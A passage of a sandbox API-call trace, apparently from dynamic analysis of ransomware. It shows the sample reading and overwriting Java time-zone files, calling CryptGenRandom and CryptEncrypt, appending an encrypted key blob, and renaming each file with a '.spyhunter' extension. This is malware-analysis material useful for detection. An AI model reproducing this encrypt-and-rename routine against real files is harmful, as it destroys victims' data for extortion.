dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.496] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana") returned 59 [0127.496] StrStrW (lpFirst="Tijuana", lpSrch=".txt") returned 0x0 [0127.496] GetProcessHeap () returned 0x2c0000 [0127.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.496] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f75c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f75c*=0x4fc, lpOverlapped=0x0) returned 1 [0127.674] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffb04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.674] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4fc, lpNumberOfBytesWritten=0x57f75c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f75c*=0x4fc, lpOverlapped=0x0) returned 1 [0127.674] GetProcessHeap () returned 0x2c0000 [0127.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.675] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.676] WriteFile (in: hFile=0xec, lpBuffer=0x57f79c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f75c, lpOverlapped=0x0 | out: lpBuffer=0x57f79c*, lpNumberOfBytesWritten=0x57f75c*=0x4, lpOverlapped=0x0) returned 1 [0127.676] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f75c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f75c*=0x30, lpOverlapped=0x0) returned 1 [0127.676] CloseHandle (hObject=0xec) returned 1 [0127.676] GetProcessHeap () returned 0x2c0000 [0127.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.676] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana.spyhunter") returned 69 [0127.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tijuana"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tijuana.spyhunter")) returned 1 [0127.677] GetProcessHeap () returned 0x2c0000 [0127.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.677] GetProcessHeap () returned 0x2c0000 [0127.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0127.677] GetProcessHeap () returned 0x2c0000 [0127.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9940 | out: hHeap=0x2c0000) returned 1 [0127.677] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7a0 | out: pbBuffer=0x57f7a0) returned 1 [0127.677] GetProcessHeap () returned 0x2c0000 [0127.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0127.678] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f798*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f798*=0x30) returned 1 [0127.678] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vladivostok" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vladivostok"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.679] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vladivostok") returned 60 [0127.679] StrStrW (lpFirst="Vladivostok", lpSrch=".txt") returned 0x0 [0127.679] GetProcessHeap () returned 0x2c0000 [0127.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.680] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f75c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f75c*=0x245, lpOverlapped=0x0) returned 1 [0127.680] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffdbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.681] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x57f75c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f75c*=0x245, lpOverlapped=0x0) returned 1 [0127.681] GetProcessHeap () returned 0x2c0000 [0127.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.681] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.681] WriteFile (in: hFile=0xec, lpBuffer=0x57f79c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f75c, lpOverlapped=0x0 | out: lpBuffer=0x57f79c*, lpNumberOfBytesWritten=0x57f75c*=0x4, lpOverlapped=0x0) returned 1 [0127.681] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f75c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f75c*=0x30, lpOverlapped=0x0) returned 1 [0127.681] CloseHandle (hObject=0xec) returned 1 [0127.681] GetProcessHeap () returned 0x2c0000 [0127.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.681] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vladivostok.spyhunter") returned 70 [0127.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vladivostok" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vladivostok"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vladivostok.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vladivostok.spyhunter")) returned 1 [0127.682] GetProcessHeap () returned 0x2c0000 [0127.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.682] GetProcessHeap () returned 0x2c0000 [0127.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0127.682] GetProcessHeap () returned 0x2c0000 [0127.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb178 | out: hHeap=0x2c0000) returned 1 [0127.682] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f798 | out: pbBuffer=0x57f798) returned 1 [0127.683] GetProcessHeap () returned 0x2c0000 [0127.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0127.683] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f790*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f790*=0x30) returned 1 [0127.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vientiane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vientiane"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.684] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vientiane") returned 58 [0127.684] StrStrW (lpFirst="Vientiane", lpSrch=".txt") returned 0x0 [0127.684] GetProcessHeap () returned 0x2c0000 [0127.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.684] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f754, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f754*=0x61, lpOverlapped=0x0) returned 1 [0127.685] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.685] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x57f754, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f754*=0x61, lpOverlapped=0x0) returned 1 [0127.685] GetProcessHeap () returned 0x2c0000 [0127.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.685] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.685] WriteFile (in: hFile=0xec, lpBuffer=0x57f794*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f754, lpOverlapped=0x0 | out: lpBuffer=0x57f794*, lpNumberOfBytesWritten=0x57f754*=0x4, lpOverlapped=0x0) returned 1 [0127.686] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f754, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f754*=0x30, lpOverlapped=0x0) returned 1 [0127.686] CloseHandle (hObject=0xec) returned 1 [0127.686] GetProcessHeap () returned 0x2c0000 [0127.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.686] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vientiane.spyhunter") returned 68 [0127.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vientiane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vientiane"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vientiane.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vientiane.spyhunter")) returned 1 [0127.687] GetProcessHeap () returned 0x2c0000 [0127.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.687] GetProcessHeap () returned 0x2c0000 [0127.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0127.687] GetProcessHeap () returned 0x2c0000 [0127.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd7c0 | out: hHeap=0x2c0000) returned 1 [0127.687] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f798 | out: pbBuffer=0x57f798) returned 1 [0127.687] GetProcessHeap () returned 0x2c0000 [0127.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0127.687] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f790*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f790*=0x30) returned 1 [0127.687] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ust-Nera" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ust-nera"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.688] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ust-Nera") returned 57 [0127.688] StrStrW (lpFirst="Ust-Nera", lpSrch=".txt") returned 0x0 [0127.688] GetProcessHeap () returned 0x2c0000 [0127.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.688] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f754, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f754*=0x255, lpOverlapped=0x0) returned 1 [0127.689] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffdab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.689] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x255, lpNumberOfBytesWritten=0x57f754, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f754*=0x255, lpOverlapped=0x0) returned 1 [0127.689] GetProcessHeap () returned 0x2c0000 [0127.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.689] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.689] WriteFile (in: hFile=0xec, lpBuffer=0x57f794*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f754, lpOverlapped=0x0 | out: lpBuffer=0x57f794*, lpNumberOfBytesWritten=0x57f754*=0x4, lpOverlapped=0x0) returned 1 [0127.689] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f754, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f754*=0x30, lpOverlapped=0x0) returned 1 [0127.689] CloseHandle (hObject=0xec) returned 1 [0127.690] GetProcessHeap () returned 0x2c0000 [0127.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.690] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ust-Nera.spyhunter") returned 67 [0127.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ust-Nera" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ust-nera"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ust-Nera.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ust-nera.spyhunter")) returned 1 [0127.778] GetProcessHeap () returned 0x2c0000 [0127.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.779] GetProcessHeap () returned 0x2c0000 [0127.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0127.779] GetProcessHeap () returned 0x2c0000 [0127.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd700 | out: hHeap=0x2c0000) returned 1 [0127.779] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f790 | out: pbBuffer=0x57f790) returned 1 [0127.779] GetProcessHeap () returned 0x2c0000 [0127.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0127.779] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f788*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f788*=0x30) returned 1 [0127.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST5EDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est5edt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.780] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST5EDT") returned 51 [0127.780] StrStrW (lpFirst="EST5EDT", lpSrch=".txt") returned 0x0 [0127.780] GetProcessHeap () returned 0x2c0000 [0127.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.780] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f74c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f74c*=0x4f8, lpOverlapped=0x0) returned 1 [0127.799] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffb08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.799] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4f8, lpNumberOfBytesWritten=0x57f74c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f74c*=0x4f8, lpOverlapped=0x0) returned 1 [0127.799] GetProcessHeap () returned 0x2c0000 [0127.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.800] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.800] WriteFile (in: hFile=0xec, lpBuffer=0x57f78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f74c, lpOverlapped=0x0 | out: lpBuffer=0x57f78c*, lpNumberOfBytesWritten=0x57f74c*=0x4, lpOverlapped=0x0) returned 1 [0127.800] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f74c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f74c*=0x30, lpOverlapped=0x0) returned 1 [0127.800] CloseHandle (hObject=0xec) returned 1 [0127.800] GetProcessHeap () returned 0x2c0000 [0127.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.800] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST5EDT.spyhunter") returned 61 [0127.800] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST5EDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est5edt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST5EDT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est5edt.spyhunter")) returned 1 [0127.801] GetProcessHeap () returned 0x2c0000 [0127.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.801] GetProcessHeap () returned 0x2c0000 [0127.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0127.801] GetProcessHeap () returned 0x2c0000 [0127.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c22070 | out: hHeap=0x2c0000) returned 1 [0127.848] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f788 | out: pbBuffer=0x57f788) returned 1 [0127.848] GetProcessHeap () returned 0x2c0000 [0127.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0127.848] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f780*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f780*=0x30) returned 1 [0127.848] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UTC" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\utc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.848] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UTC") returned 51 [0127.848] StrStrW (lpFirst="UTC", lpSrch=".txt") returned 0x0 [0127.848] GetProcessHeap () returned 0x2c0000 [0127.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.849] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f744, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f744*=0x1b, lpOverlapped=0x0) returned 1 [0127.849] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.849] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57f744, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f744*=0x1b, lpOverlapped=0x0) returned 1 [0127.850] GetProcessHeap () returned 0x2c0000 [0127.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.850] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.850] WriteFile (in: hFile=0xec, lpBuffer=0x57f784*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f744, lpOverlapped=0x0 | out: lpBuffer=0x57f784*, lpNumberOfBytesWritten=0x57f744*=0x4, lpOverlapped=0x0) returned 1 [0127.850] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f744, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f744*=0x30, lpOverlapped=0x0) returned 1 [0127.850] CloseHandle (hObject=0xec) returned 1 [0127.850] GetProcessHeap () returned 0x2c0000 [0127.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.850] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UTC.spyhunter") returned 61 [0127.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UTC" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\utc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UTC.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\utc.spyhunter")) returned 1 [0127.851] GetProcessHeap () returned 0x2c0000 [0127.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.851] GetProcessHeap () returned 0x2c0000 [0127.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0127.851] GetProcessHeap () returned 0x2c0000 [0127.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe720 | out: hHeap=0x2c0000) returned 1 [0127.851] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f788 | out: pbBuffer=0x57f788) returned 1 [0127.851] GetProcessHeap () returned 0x2c0000 [0127.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0127.851] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f780*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f780*=0x30) returned 1 [0127.851] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UCT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\uct"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.851] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UCT") returned 51 [0127.851] StrStrW (lpFirst="UCT", lpSrch=".txt") returned 0x0 [0127.852] GetProcessHeap () returned 0x2c0000 [0127.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.852] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f744, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f744*=0x1b, lpOverlapped=0x0) returned 1 [0127.852] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.852] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57f744, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f744*=0x1b, lpOverlapped=0x0) returned 1 [0127.853] GetProcessHeap () returned 0x2c0000 [0127.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.853] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.853] WriteFile (in: hFile=0xec, lpBuffer=0x57f784*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f744, lpOverlapped=0x0 | out: lpBuffer=0x57f784*, lpNumberOfBytesWritten=0x57f744*=0x4, lpOverlapped=0x0) returned 1 [0127.854] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f744, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f744*=0x30, lpOverlapped=0x0) returned 1 [0127.855] CloseHandle (hObject=0xec) returned 1 [0127.855] GetProcessHeap () returned 0x2c0000 [0127.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, 